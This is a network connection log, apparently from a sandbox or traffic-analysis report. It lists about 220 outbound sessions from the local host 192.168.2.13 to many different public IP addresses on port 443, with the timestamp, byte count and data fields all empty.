                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13959192.168.2.135419089.130.21.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13960192.168.2.135742612.101.231.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13961192.168.2.135667676.163.23.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13962192.168.2.135896875.155.9.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13963192.168.2.135635667.200.205.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13964192.168.2.135042280.14.166.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13965192.168.2.1349994120.203.57.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13966192.168.2.133398836.206.4.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13967192.168.2.1336362187.200.147.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13968192.168.2.133651024.60.120.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13969192.168.2.135059046.126.51.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13970192.168.2.1352992171.237.242.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13971192.168.2.1360660169.1.245.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13972192.168.2.1358358209.162.207.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13973192.168.2.133750048.245.220.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13974192.168.2.135088852.26.115.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13975192.168.2.134432619.204.150.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13976192.168.2.13422264.129.189.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13977192.168.2.1354846184.63.208.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13978192.168.2.133489441.105.169.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13979192.168.2.134083639.112.9.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13980192.168.2.1339784110.16.241.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13981192.168.2.1337366118.33.17.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13982192.168.2.1342554208.223.62.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13983192.168.2.135187094.107.151.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13984192.168.2.133329492.136.174.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13985192.168.2.133480036.229.26.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13986192.168.2.1344264212.68.203.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13987192.168.2.1359474147.48.234.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13988192.168.2.1351756209.212.79.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13989192.168.2.135127277.204.108.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13990192.168.2.1336022168.99.184.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13991192.168.2.1334352134.38.207.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13992192.168.2.1333734201.87.217.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13993192.168.2.134665651.40.194.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13994192.168.2.135996085.217.208.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13995192.168.2.1341222137.83.188.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13996192.168.2.133758072.19.85.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13997192.168.2.134138290.141.93.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13998192.168.2.1359078152.178.4.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13999192.168.2.134099251.20.15.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14000192.168.2.135689475.102.25.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14001192.168.2.133726851.120.135.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14002192.168.2.1350686104.102.121.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14003192.168.2.134198017.4.34.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14004192.168.2.1347808131.79.7.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14005192.168.2.1335388145.77.201.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14006192.168.2.1344964161.71.148.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14007192.168.2.1351568191.8.92.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14008192.168.2.1335998137.220.202.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14009192.168.2.1346934193.248.110.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14010192.168.2.1343290131.46.114.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14011192.168.2.1352710219.190.117.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14012192.168.2.13413949.152.74.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14013192.168.2.133456474.115.225.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14014192.168.2.135920677.141.126.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14015192.168.2.133544446.186.105.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14016192.168.2.1347102197.163.78.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14017192.168.2.134617640.137.189.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14018192.168.2.1339344153.243.93.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14019192.168.2.134633042.2.100.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14020192.168.2.1356384208.223.29.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14021192.168.2.1346302158.193.58.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14022192.168.2.135001448.100.36.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14023192.168.2.133370431.93.201.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14024192.168.2.1333276156.21.123.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14025192.168.2.1343896221.44.33.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14026192.168.2.1340152145.182.23.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14027192.168.2.134838490.82.113.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14028192.168.2.1352232201.89.35.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14029192.168.2.1334534179.209.214.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14030192.168.2.133374299.235.205.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14031192.168.2.135310680.96.227.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14032192.168.2.134298094.26.96.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14033192.168.2.134109295.66.49.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14034192.168.2.1353786104.50.136.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14035192.168.2.1353902180.96.194.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14036192.168.2.1355202222.43.61.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14037192.168.2.1338196135.223.223.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14038192.168.2.1335766193.113.88.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14039192.168.2.133700295.128.97.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14040192.168.2.1339006216.168.144.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14041192.168.2.1360798107.198.134.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14042192.168.2.133322686.30.130.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14043192.168.2.135190680.174.21.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14044192.168.2.1350850163.2.47.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14045192.168.2.133408057.132.170.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14046192.168.2.136077624.216.242.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14047192.168.2.134381498.250.177.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14048192.168.2.133726614.250.73.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14049192.168.2.1359604145.227.115.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14050192.168.2.1357732183.238.150.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14051192.168.2.13580048.12.140.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14052192.168.2.134193496.205.8.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14053192.168.2.1347290166.153.216.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14054192.168.2.1344760141.100.125.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14055192.168.2.1333282152.182.156.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14056192.168.2.133568660.77.216.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14057192.168.2.1356410197.79.211.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14058192.168.2.133960886.109.195.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14059192.168.2.1347642133.111.20.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14060192.168.2.136008643.104.73.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14061192.168.2.135717883.174.39.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14062192.168.2.134914275.22.133.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14063192.168.2.134022454.80.48.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14064192.168.2.134600638.201.59.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14065192.168.2.1355314119.248.23.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14066192.168.2.1344472212.239.221.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14067192.168.2.133669236.92.52.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14068192.168.2.134590685.3.228.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14069192.168.2.1345764107.224.201.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14070192.168.2.1341134186.125.185.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14071192.168.2.1346986196.92.107.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14072192.168.2.1352018157.164.87.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14073192.168.2.135216869.217.207.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14074192.168.2.1354110182.217.144.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14075192.168.2.1343498181.237.21.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14076192.168.2.1338716213.222.221.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14077192.168.2.1352250200.195.112.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14078192.168.2.135704037.241.212.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14079192.168.2.133937295.102.85.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14080192.168.2.1334984188.95.162.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14081192.168.2.1358826124.146.101.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14082192.168.2.134691890.200.153.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14083192.168.2.134879667.218.199.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14084192.168.2.1334146142.43.252.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14085192.168.2.1335528176.202.108.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14086192.168.2.13489504.26.148.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14087192.168.2.135927846.89.25.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14088192.168.2.1356364193.65.76.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14089192.168.2.1347240152.95.38.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14090192.168.2.135433060.28.79.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14091192.168.2.1356996117.144.131.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14092192.168.2.1349088205.52.190.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14093192.168.2.1337736149.165.76.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14094192.168.2.133771087.206.43.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14095192.168.2.1349154176.18.242.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14096192.168.2.135480878.191.84.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14097192.168.2.133511648.216.178.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14098192.168.2.1338828208.30.27.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14099192.168.2.135388468.231.230.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14100192.168.2.13568829.187.246.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14101192.168.2.134078854.64.168.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14102192.168.2.133548427.184.71.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14103192.168.2.1343872102.252.25.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14104192.168.2.1340398141.2.149.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14105192.168.2.1353894142.151.89.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14106192.168.2.1344444160.44.101.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14107192.168.2.134893048.154.207.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14108192.168.2.134824679.167.151.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14109192.168.2.1341532186.235.46.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14110192.168.2.1358408187.202.37.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14111192.168.2.134899086.166.182.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14112192.168.2.134397480.229.77.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14113192.168.2.136055465.229.192.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14114192.168.2.133677214.212.174.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14115192.168.2.135788812.146.61.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14116192.168.2.133909832.247.250.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14117192.168.2.135687677.9.0.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14118192.168.2.135171825.242.233.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14119192.168.2.135148473.67.10.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14120192.168.2.1333982176.169.8.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14121192.168.2.1360962132.140.155.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14122192.168.2.1339738179.31.11.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14123192.168.2.135216227.68.30.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14124192.168.2.1350444105.164.52.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14125192.168.2.135963024.158.208.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14126192.168.2.133648869.27.162.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14127192.168.2.1348634113.201.97.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14128192.168.2.135132242.12.85.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14129192.168.2.135307437.218.93.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14130192.168.2.134348063.131.222.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14131192.168.2.134802682.149.40.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14132192.168.2.133288688.164.181.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14133192.168.2.134976498.42.1.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14134192.168.2.1335254107.255.54.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14135192.168.2.1339928222.159.245.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14136192.168.2.134712236.25.200.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14137192.168.2.133541462.202.103.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14138192.168.2.1360372223.219.59.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14139192.168.2.1341388117.4.134.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14140192.168.2.1343540179.183.213.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14141192.168.2.1344692125.152.78.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14142192.168.2.1335152115.160.211.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14143192.168.2.133733627.60.112.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14144192.168.2.136096085.25.79.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14145192.168.2.1339156211.61.89.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14146192.168.2.1353146113.131.150.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14147192.168.2.1351412216.250.210.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14148192.168.2.1353182170.13.182.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14149192.168.2.1347776191.57.24.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14150192.168.2.1333572220.166.143.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14151192.168.2.134832442.48.210.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14152192.168.2.135114462.235.162.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14153192.168.2.1347000172.97.54.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14154192.168.2.133356079.220.30.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14155192.168.2.1352400144.72.86.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14156192.168.2.135539251.161.115.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14157192.168.2.1339084163.205.159.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14158192.168.2.133964023.7.10.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14159192.168.2.1345460156.231.111.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14160192.168.2.1340994113.95.25.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14161192.168.2.1353066149.113.58.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14162192.168.2.1347176184.178.81.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14163192.168.2.1357140212.176.131.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14164192.168.2.133458476.110.197.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14165192.168.2.1356118171.161.231.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14166192.168.2.1337752140.79.104.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14167192.168.2.1346938222.108.79.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14168192.168.2.1347064122.44.63.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14169192.168.2.135191466.46.89.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14170192.168.2.135244035.58.107.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14171192.168.2.134802444.76.5.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14172192.168.2.133369864.214.214.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14173192.168.2.1344538194.41.202.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14174192.168.2.133723268.54.29.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14175192.168.2.1338510207.12.199.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14176192.168.2.1359788120.115.196.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14177192.168.2.134909014.19.4.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14178192.168.2.1343310152.181.235.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14179192.168.2.134288295.9.240.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14180192.168.2.135184052.247.38.16443
                                                TimestampBytes transferredDirectionData


